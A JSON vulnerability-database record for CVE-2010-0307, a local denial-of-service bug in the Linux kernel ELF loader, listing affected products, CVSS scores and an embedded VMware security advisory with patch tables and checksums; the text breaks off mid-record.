        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "intuity audix lx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux enterprise high availability extension",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "38027"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.6.32.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:6.06:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:9.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:8.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:8.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:9.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Mathias Krause",
    "sources": [
      {
        "db": "BID",
        "id": "38027"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2010-0307",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.7,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 4.7,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2010-0307",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.7,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "id": "VHN-42912",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2010-0307",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201002-160",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-42912",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2010-0307",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42912"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0307"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The load_elf_binary function in fs/binfmt_elf.c in the Linux kernel before 2.6.32.8 on the x86_64 platform does not ensure that the ELF interpreter is available before a call to the SET_PERSONALITY macro, which allows local users to cause a denial of service (system crash) via a 32-bit application that attempts to execute a 64-bit application and then triggers a segmentation fault, as demonstrated by amd64_killer, related to the flush_old_exec function. The Linux kernel is prone to a local denial-of-service vulnerability. \nAttackers can exploit this issue to cause the affected kernel to crash, denying service to legitimate users. \nVersions prior to Linux kernel 2.6.33-rc6 are vulnerable. \nNOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled. The NFSv4 implementation is one of the distributed file system protocols. This doesn\u0027t cause problems if execve() succeeds, but after SET_PERSONALITY() the open_exec() call fails because the interpreter cannot be found and execve() returns an error almost immediately. The vsyscall page is incorrectly mapped in /proc/PID/maps while the process is still running. At this point a segmentation fault is triggered and the kernel crashes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2011-0003\nSynopsis:          Third party component updates for VMware vCenter\n                   Server, vCenter Update Manager, ESXi and ESX\nIssue date:        2011-02-10\nUpdated on:        2011-02-10 (initial release of advisory)\nCVE numbers:       --- Apache Tomcat ---\n                   CVE-2009-2693 CVE-2009-2901 CVE-2009-2902\n                   CVE-2009-3548 CVE-2010-2227 CVE-2010-1157\n                   --- Apache Tomcat Manager ---\n                   CVE-2010-2928\n                   --- cURL ---\n                   CVE-2010-0734\n                   --- COS Kernel ---\n                   CVE-2010-1084 CVE-2010-2066 CVE-2010-2070\n                   CVE-2010-2226 CVE-2010-2248 CVE-2010-2521\n                   CVE-2010-2524 CVE-2010-0008 CVE-2010-0415\n                   CVE-2010-0437 CVE-2009-4308 CVE-2010-0003\n                   CVE-2010-0007 CVE-2010-0307 CVE-2010-1086\n                   CVE-2010-0410 CVE-2010-0730 CVE-2010-1085\n                   CVE-2010-0291 CVE-2010-0622 CVE-2010-1087\n                   CVE-2010-1173 CVE-2010-1437 CVE-2010-1088\n                   CVE-2010-1187 CVE-2010-1436 CVE-2010-1641\n                   CVE-2010-3081\n                   --- Microsoft SQL Express ---\n                   CVE-2008-5416 CVE-2008-0085 CVE-2008-0086\n                   CVE-2008-0107 CVE-2008-0106\n                   --- OpenSSL ---\n                   CVE-2010-0740 CVE-2010-0433\n                   CVE-2010-3864 CVE-2010-2939\n                   --- Oracle (Sun) JRE ---\n                   CVE-2009-3555 CVE-2010-0082 CVE-2010-0084\n                   CVE-2010-0085 CVE-2010-0087 CVE-2010-0088\n                   CVE-2010-0089 CVE-2010-0090 CVE-2010-0091\n                   CVE-2010-0092 CVE-2010-0093 CVE-2010-0094\n                   CVE-2010-0095 CVE-2010-0837 CVE-2010-0838\n                   CVE-2010-0839 CVE-2010-0840 CVE-2010-0841\n                   CVE-2010-0842 CVE-2010-0843 CVE-2010-0844\n                   CVE-2010-0845 CVE-2010-0846 CVE-2010-0847\n                   CVE-2010-0848 CVE-2010-0849 CVE-2010-0850\n                   CVE-2010-0886 CVE-2010-3556 CVE-2010-3566\n                   CVE-2010-3567 CVE-2010-3550 CVE-2010-3561\n                   CVE-2010-3573 CVE-2010-3565 CVE-2010-3568\n                   CVE-2010-3569 CVE-2010-1321 CVE-2010-3548\n                   CVE-2010-3551 CVE-2010-3562 CVE-2010-3571\n                   CVE-2010-3554 CVE-2010-3559 CVE-2010-3572\n                   CVE-2010-3553 CVE-2010-3549 CVE-2010-3557\n                   CVE-2010-3541 CVE-2010-3574\n                   --- pam_krb5 ---\n                   CVE-2008-3825 CVE-2009-1384\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere\n   Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues. \n\n\n2. Relevant releases\n\n   vCenter Server 4.1 without Update 1,\n\n   vCenter Update Manager 4.1 without Update 1,\n\n   ESXi 4.1 without patch ESXi410-201101201-SG,\n\n   ESX 4.1 without patch ESX410-201101201-SG. \n\n\n3. Problem Description\n\n a. vCenter Server and vCenter Update Manager update Microsoft\n    SQL Server 2005 Express Edition to Service Pack 3\n\n    Microsoft SQL Server 2005 Express Edition (SQL Express)\n    distributed with vCenter Server 4.1 Update 1 and vCenter Update\n    Manager 4.1 Update 1 is upgraded from  SQL Express Service Pack 2\n    to SQL Express Service Pack 3, to address multiple security\n    issues that exist in the earlier releases of Microsoft SQL Express. \n\n    Customers using other database solutions need not update for\n    these issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,\n    CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL\n    Express Service Pack 3. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    Update Manager 4.1       Windows  Update 1\n    Update Manager 4.0       Windows  affected, patch pending\n    Update Manager 1.0       Windows  affected, no patch planned\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            any       ESX      not affected\n\n  * Hosted products are VMware Workstation, Player, ACE, Fusion. \n\n b. vCenter Apache Tomcat Management Application Credential Disclosure\n\n    The Apache Tomcat Manager application configuration file contains\n    logon credentials that can be read by unprivileged local users. \n\n    The issue is resolved by removing the Manager application in\n    vCenter 4.1 Update 1. \n\n    If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon\n    credentials are not present in the configuration file after the\n    update. \n\n    VMware would like to thank Claudio Criscione of Secure Networking\n    for reporting this issue to us. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-2928 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  not affected\n    VirtualCenter  2.5       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            any       ESX      not affected\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version\n    1.6.0_21\n\n    Oracle (Sun) JRE update to version 1.6.0_21, which addresses\n    multiple security issues that existed in earlier releases of\n    Oracle (Sun) JRE. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,\n    CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,\n    CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,\n    CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,\n    CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,\n    CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,\n    CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,\n    CVE-2010-0850. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following name to the security issue fixed in\n    Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  not applicable **\n    VirtualCenter  2.5       Windows  not applicable **\n\n    Update Manager 4.1       Windows  not applicable **\n    Update Manager 4.0       Windows  not applicable **\n    Update Manager 1.0       Windows  not applicable **\n\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      not applicable **\n    ESX            3.5       ESX      not applicable **\n    ESX            3.0.3     ESX      not applicable **\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Oracle (Sun) JRE 1.5.0 family\n\nd. vCenter Update Manager Oracle (Sun) JRE is updated to version\n   1.5.0_26\n\n    Oracle (Sun) JRE update to version 1.5.0_26, which addresses\n    multiple security issues that existed in earlier releases of\n    Oracle (Sun) JRE. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,\n    CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,\n    CVE-2010-3565,CVE-2010-3568, CVE-2010-3569,  CVE-2009-3555,\n    CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,\n    CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,\n    CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,\n    CVE-2010-3574. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  not applicable **\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    Update Manager 4.1       Windows  Update 1\n    Update Manager 4.0       Windows  affected, patch pending\n    Update Manager 1.0       Windows  affected, no patch planned\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      not applicable **\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, no patch planned\n    ESX            3.0.3     ESX      affected, no patch planned\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Oracle (Sun) JRE 1.6.0 family\n\n e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28\n\n    Apache Tomcat updated to version 6.0.28, which addresses multiple\n    security issues that existed in earlier releases of Apache Tomcat\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i\n    and CVE-2009-3548. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  not applicable **\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not applicable **\n    ESX            3.0.3     ESX      not applicable **\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Apache Tomcat 5.5 family\n\n f. vCenter Server third party component OpenSSL updated to version\n    0.9.8n\n\n    The version of the OpenSSL library in vCenter Server is updated to\n    0.9.8n. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-0740 and CVE-2010-0433 to the\n    issues addressed in this version of OpenSSL. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            any       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE,  Fusion. \n\n g. ESX third party component OpenSSL updated to version 0.9.8p\n\n    The version of the ESX OpenSSL library is updated to 0.9.8p. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-3864 and CVE-2010-2939 to the\n    issues addressed in this update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n    ESXi           4.1       ESXi     ESXi410-201101201-SG\n    ESXi           4.0       ESXi     affected, patch pending\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n h. ESXi third party component cURL updated\n\n    The version of cURL library in ESXi is updated. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2010-0734 to the issues addressed in\n    this update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           4.1       ESXi     ESXi410-201101201-SG\n    ESXi           4.0       ESXi     affected, patch pending\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            any       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n i. ESX third party component pam_krb5 updated\n\n    The version of pam_krb5 library is updated. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-3825 and CVE-2009-1384 to the\n    issues addressed in the update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n j. ESX third party update for Service Console kernel\n\n    The Service Console kernel is updated to include kernel version\n    2.6.18-194.11.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,\n    CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,\n    CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,\n    CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,\n    CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,\n    CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,\n    CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and\n    CVE-2010-3081 to the issues addressed in the update. \n\n    Note: This update also addresses the 64-bit compatibility mode\n    stack pointer underflow issue identified by CVE-2010-3081. This\n    issue was patched in an ESX 4.1 patch prior to the release of\n    ESX 4.1 Update 1. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the checksum of your downloaded file. \n\n   VMware vCenter Server 4.1 Update 1 and modules\n   ----------------------------------------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n   http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html\n\n   File type: .iso\n   md5sum: 729cf247aa5d33ceec431c86377eee1a\n   sha1sum: c1e10a5fcbc1ae9d13348d43541d574c563d66f0\n\n   File type: .zip\n   md5sum: fd1441bef48a153f2807f6823790e2f0\n   sha1sum: 31737a816ed1c08ab3a505fb6db2483f49ad7c19\n\n   VMware vSphere Client\n   File type: .exe\n   md5sum: cb6aa91ada1289575355d79e8c2a9f8e\n   sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESXi 4.1 Installable Update 1\n   -----------------------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html\n   http://kb.vmware.com/kb/1027919\n\n   File type: .iso\n   MD5SUM: d68d6c2e040a87cd04cd18c04c22c998\n   SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1)\n   File type: .zip\n   MD5SUM: 2f1e009c046b20042fae3b7ca42a840f\n   SHA1SUM: 